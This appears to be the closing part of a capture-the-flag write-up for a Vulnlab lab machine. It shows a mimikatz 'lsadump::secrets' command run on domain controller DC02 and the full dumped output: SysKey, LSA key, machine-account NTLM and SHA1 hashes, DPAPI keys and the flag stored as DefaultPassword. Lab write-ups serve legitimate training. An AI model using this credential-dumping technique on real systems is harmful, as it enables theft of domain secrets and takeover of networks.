⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣴⣶⣿⣭⣍⡉⠙⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⢀⣠⣶⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠉⠉⠛⠻⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡷⢂⣓⣶⣶⣶⣶⣤⣤⣄⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⢿⣿⣿⣿⠟⢀⣴⢿⣿⣿⣿⠟⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠛⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠤⠤⠤⠤⠙⣻⣿⣿⣿⣿⣿⣿⣾⣿⣿⡏⣠⠟⡉⣾⣿⣿⠋⡠⠊⣿⡟⣹⣿⢿⣿⣿⣿⠿⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⣶⣤⣭⣤⣼⣿⢛⣿⣿⣿⣿⣻⣿⣿⠇⠐⢀⣿⣿⡷⠋⠀⢠⣿⣺⣿⣿⢺⣿⣋⣉⣉⣩⣴⣶⣤⣤⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠉⠛⠻⠿⣿⣿⣿⣇⢻⣿⣿⡿⠿⣿⣯⡀⠀⢸⣿⠋⢀⣠⣶⠿⠿⢿⡿⠈⣾⣿⣿⣿⣿⡿⠿⠛⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠻⢧⡸⣿⣿⣿⠀⠃⠻⠟⢦⢾⢣⠶⠿⠏⠀⠰⠀⣼⡇⣸⣿⣿⠟⠉⠀⠀⢀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣴⣾⣶⣽⣿⡟⠓⠒⠀⠀⡀⠀⠠⠤⠬⠉⠁⣰⣥⣾⣿⣿⣶⣶⣷⡶⠄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠉⠉⠉⠹⠟⣿⣿⡄⠀⠀⠠⡇⠀⠀⠀⠀⠀⢠⡟⠛⠛⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⠋⠹⣷⣄⠀⠐⣊⣀⠀⠀⢀⡴⠁⠣⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣤⣀⠤⠊⢁⡸⠀⣆⠹⣿⣧⣀⠀⠀⡠⠖⡑⠁⠀⠀⠀⠑⢄⣀⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣦⣶⣿⣿⣟⣁⣤⣾⠟⠁⢀⣿⣆⠹⡆⠻⣿⠉⢀⠜⡰⠀⠀⠈⠑⢦⡀⠈⢾⠑⡾⠲⣄⠀⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⣀⣤⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠖⠒⠚⠛⠛⠢⠽⢄⣘⣤⡎⠠⠿⠂⠀⠠⠴⠶⢉⡭⠃⢸⠃⠀⣿⣿⣿⠡⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⡤⠶⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣋⠁⠀⠀⠀⠀⠀⢹⡇⠀⠀⠀⠀⠒⠢⣤⠔⠁⠀⢀⡏⠀⠀⢸⣿⣿⠀⢻⡟⠑⠢⢄⡀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⢸⠀⠀⠀⡀⠉⠛⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⣀⣀⡀⠀⢸⣷⡀⣀⣀⡠⠔⠊⠀⠀⢀⣠⡞⠀⠀⠀⢸⣿⡿⠀⠘⠀⠀⠀⠀⠈⠑⢤⠀⠀⠀
⠀⠀⢀⣴⣿⡀⠀⠀⡇⠀⠀⠀⠈⣿⣿⣿⣿⣿⣿⣿⣿⣝⡛⠿⢿⣷⣦⣄⡀⠈⠉⠉⠁⠀⠀⠀⢀⣠⣴⣾⣿⡿⠁⠀⠀⠀⢸⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⡜⠀⠀⠀
⠀⢀⣾⣿⣿⡇⠀⢰⣷⠀⢀⠀⠀⢹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣦⣭⣍⣉⣉⠀⢀⣀⣤⣶⣾⣿⣿⣿⢿⠿⠁⠀⠀⠀⠀⠘⠀⠀⠀⠀⠀⠀⠀⠀⠀⡰⠉⢦⠀⠀
⢀⣼⣿⣿⡿⢱⠀⢸⣿⡀⢸⣧⡀⠀⢿⣿⣿⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡭⠖⠁⠀⡠⠂⠀⠀⠀⠀⠀⠀⠀⠀⢠⠀⠀⠀⢠⠃⠀⠈⣀⠀
⢸⣿⣿⣿⡇⠀⢧⢸⣿⣇⢸⣿⣷⡀⠈⣿⣿⣇⠈⠛⢿⣿⣿⣿⣿⣿⣿⠿⠿⠿⠿⠿⠿⠟⡻⠟⠉⠀⠀⡠⠊⠀⢠⠀⠀⠀⠀⠀⠀⠀⠀⣾⡄⠀⢠⣿⠔⠁⠀⢸⠀
⠈⣿⣿⣿⣷⡀⠀⢻⣿⣿⡜⣿⣿⣷⡀⠈⢿⣿⡄⠀⠀⠈⠛⠿⣿⣿⣿⣷⣶⣶⣶⡶⠖⠉⠀⣀⣤⡶⠋⠀⣠⣶⡏⠀⠀⠀⠀⠀⠀⠀⢰⣿⣧⣶⣿⣿⠖⡠⠖⠁⠀
⠀⣿⣿⣷⣌⡛⠶⣼⣿⣿⣷⣿⣿⣿⣿⡄⠈⢻⣷⠀⣄⡀⠀⠀⠀⠈⠉⠛⠛⠛⠁⣀⣤⣶⣾⠟⠋⠀⣠⣾⣿⡟⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⠷⠊⠀⢰⠀⠀
⢰⣿⣿⠀⠈⢉⡶⢿⣿⣿⣿⣿⣿⣿⣿⣿⣆⠀⠙⢇⠈⢿⣶⣦⣤⣀⣀⣠⣤⣶⣿⣿⡿⠛⠁⢀⣤⣾⣿⣿⡿⠁⠀⠀⠀⠀⠀⠀⠀⣸⣿⡿⠿⠋⠙⠒⠄⠀⠉⡄⠀
⣿⣿⡏⠀⠀⠁⠀⠀⠀⠉⠉⠙⢻⣿⣿⣿⣿⣷⡀⠀⠀⠀⠻⣿⣿⣿⣿⣿⠿⠿⠛⠁⠀⣀⣴⣿⣿⣿⣿⠟⠀⠀⠀⠀⠀⠀⠀⠀⢠⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠰⠀

The flag is in memory (user "root").

┌∩┐(◣◢)┌∩┐ Fuck da rabbit hole ╭∩╮( •̀•́ )╭∩╮

Use mimikatz module to grab all secrets:

mimikatz -Commands "privilege::debug" -Commands "lsadump::secrets"

  .#####.   mimikatz 2.2.0 (x64) #19041 Dec  1 2021 12:21:44
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::secrets
Domain : DC02
SysKey : cfedd0dfb13d69c4155c5eb4f851fc2c

Local name : DC02 ( S-1-5-21-105938765-1249442939-3198801933 )
Domain name : MYTHICAL-EU ( S-1-5-21-1148612195-3581135157-3534241443 )
Domain FQDN : mythical-eu.vl

Policy subsystem is : 1.18
LSA Key(s) : 1, default {95285f41-202d-8ff0-e19f-2742e7017ced}
  [00] {95285f41-202d-8ff0-e19f-2742e7017ced} 7e6d4f459d0f6e16dfee80dc9df410818e7139b4f931cf2c178b3b01c4233c23

Secret  : $MACHINE.ACC
cur/hex : 75 32 31 90 b6 06 31 a6 94 71 30 9d 9c 9f 17 b2 3a 0b 4b 68 2b 83 cc d2 da 5c d1 88 0d c3 b0 f5 94 e5 29 c7 53 ee f5 fc 21 72 bf 38 50 13 24 a2 c1 68 09 4f b3 b7 09 09 10 37 af eb 42 67 a6 96 8b 03 d2 55 fa 98 3d ab f5 b4 54 a3 f6 c2 72 bf 53 f9 9b d6 45 ba e1 53 9d 15 c5 86 f3 b4 58 b8 3a 68 23 2c 21 89 e5 18 24 17 9a 4d 68 bd b9 8a f1 3b 76 b0 7a 2a 3e 5f bc 39 01 f0 41 7f 47 9b cc bf df 2a df 76 da ae 22 78 d8 dd eb 05 a1 76 59 f4 b2 cb af 55 e7 73 31 02 43 1f 7b e0 03 11 09 0a 8c bc 87 1e 1d 72 2c 3e d4 5b 10 38 14 f1 c0 fb 95 c7 2d c4 18 fa 74 ff 80 d3 68 10 68 2c 0a 2a 55 21 60 20 23 79 3d 52 3a 6c 44 ae 84 7e e5 68 e8 c3 5c 28 9a 7e 83 63 84 ce f8 63 07 fe d8 b7 78 69 f9 81 c1 20 d8 f1 7a 23 5e 52 b1 bc 
    NTLM:560ce689e1594d2004b37188bd6cf670
    SHA1:2e3327bd761e082847ae38dfa15d6de296c44b7e
old/hex : 55 9a f1 cf 47 0c 66 b3 77 31 43 00 5d f3 29 b7 2d 9d 49 4c b0 1a 42 fe f7 39 8a 30 9e de 9f ad 1e b1 96 08 4e 56 e8 1b 0e 23 8d a2 79 19 99 24 d9 bf 67 a2 26 8f d2 ed 55 52 c5 4f d4 38 18 bb 5a a0 c0 93 95 25 d2 0e 1b c2 87 07 c4 6f ef d4 f2 1b d6 ba 5d 35 d0 4b 62 38 2a 1e 4c c4 34 d7 f5 ab ee 8b a6 c4 72 7a a0 74 24 0e a4 f6 20 e2 13 be 8e 59 05 31 b2 49 bf 82 ef ea 68 d6 05 73 a3 44 70 c2 bc 52 b7 27 02 97 ae 65 b2 0a 69 46 6c bb 8d 09 12 6f 9c 86 7f d1 25 a1 e5 c1 d9 2b b3 f0 c9 06 83 aa 06 9c 69 94 80 29 4a 4f ca 2f 85 40 40 c9 b7 87 ee cb ff 99 a3 1e 5a cc 28 38 e8 98 5d ca 54 29 03 6c d5 57 37 ad a0 7a 70 a0 d7 a8 2c 67 b6 28 ce 7f a2 0a 8c 4a ac be 1c 7a 5f 86 4d e8 47 f8 5c 8d bc 0a 73 eb d7 34 4d 9a e6 2c 32 7e 6a 71 0a e5 c3 c8 0a ac ab 1f 1a 7b 40 60 0c 2c 5c b2 c4 c4 6b e2 c3 ba f6 09 72 3d b0 cb 2e 84 4b 5b c3 ab a7 24 76 0c 6c 9b 57 39 1a 5d 11 16 c8 68 8e 91 01 f0 a9 08 22 a0 7b 63 7b 1f b3 90 50 f3 4f 3d f9 8f 69 2c ce 2b db d5 39 79 9d b8 db 25 32 79 14 bb 89 e9 eb 70 f6 63 ca a4 ff 92 73 4d eb b8 15 e3 57 cd 21 ce 1a 1c b6 34 a0 07 0e 32 fa e1 88 89 a4 0e 5b 46 00 4e 76 40 70 53 65 4e 2f 27 c7 8d 0b 11 d4 95 0a 3a a3 ef 81 e8 95 38 05 5e fb de 97 59 e6 da 11 74 92 7c 85 de 37 5a 52 d1 b2 bf 4b 1c 15 ba 8a 19 59 6c 96 36 83 68 28 98 c5 ae 05 2a 5f be 23 50 a8 af 43 7d 3c f1 c2 a1 9a 5e e7 f2 74 31 c4 98 e8 c4 d1 74 1b d8 7f f2 17 2e 98 de 24 7b 59 33 8a 44 ee e6 08 ee 12 f6 b2 63 85 59 1f 80 1d 06 0d 99 02 a5 27 1d c2 b6 57 b9 96 bc a6 36 33 40 59 f7 b5 bb 0b 7b 99 6f fa 43 f0 9f d2 ed 1c f5 
    NTLM:88582942999e56c63130cc6c406a04ed
    SHA1:ce76241e132bb08bbc80a4e0dd2018ece69902e0

Secret  : DefaultPassword
cur/text: VL{f261e601d8f753249b3e98c1e653dd36}

Secret  : DPAPI_SYSTEM
cur/hex : 01 00 00 00 8d 46 37 5e 76 d4 0e b1 dc 37 3c 15 3c 28 64 a7 9e 46 dd fa dd 00 19 fd 99 ec 01 a4 b4 85 66 cb 00 c3 41 30 ef ec 51 69 
    full: 8d46375e76d40eb1dc373c153c2864a79e46ddfadd0019fd99ec01a4b48566cb00c34130efec5169
    m/u : 8d46375e76d40eb1dc373c153c2864a79e46ddfa / dd0019fd99ec01a4b48566cb00c34130efec5169
old/hex : 01 00 00 00 1d 70 58 77 ff 6f f1 4c 84 dc b4 56 4e b3 77 37 93 f2 9b d4 fd 42 4c 35 58 e2 39 97 8f 50 d2 7d 4e d2 e6 6e ff 18 a0 4e 
    full: 1d705877ff6ff14c84dcb4564eb3773793f29bd4fd424c3558e239978f50d27d4ed2e66eff18a04e
    m/u : 1d705877ff6ff14c84dcb4564eb3773793f29bd4 / fd424c3558e239978f50d27d4ed2e66eff18a04e

Secret  : NL$KM
cur/hex : 28 f4 02 7a 07 c3 c4 3c c4 d1 25 54 97 41 fc 18 a5 59 88 76 59 a4 8b bd 2e eb be 97 96 a0 08 d2 9f f2 f3 f4 a1 0a 13 31 9d df 1a 74 44 4c e7 dc 33 85 b3 ac 7d 28 fc 7f 66 e2 a2 62 a4 c0 16 6e 
old/hex : 28 f4 02 7a 07 c3 c4 3c c4 d1 25 54 97 41 fc 18 a5 59 88 76 59 a4 8b bd 2e eb be 97 96 a0 08 d2 9f f2 f3 f4 a1 0a 13 31 9d df 1a 74 44 4c e7 dc 33 85 b3 ac 7d 28 fc 7f 66 e2 a2 62 a4 c0 16 6e 

Secret  : _SC_MSSQL$SQLEXPRESS / service 'MSSQL$SQLEXPRESS' with username : NT Service\MSSQL$SQLEXPRESS

Secret  : _SC_SQLTELEMETRY$SQLEXPRESS / service 'SQLTELEMETRY$SQLEXPRESS' with username : NT Service\SQLTELEMETRY$SQLEXPRESS
[*] Process exited with code: 0x0

And finally get the last Mythical_Root flag:

VL{f261e601d8f753249b3e98c1e653dd36}

MITTRE ATT&CK mapping

image

Extra

Challenge solved! Use this link to share it: https://api.vulnlab.com/api/v1/share?id=0c6b0346-701f-439b-880e-19e1091a9cb9

Gdj1pW6XMAA9GVN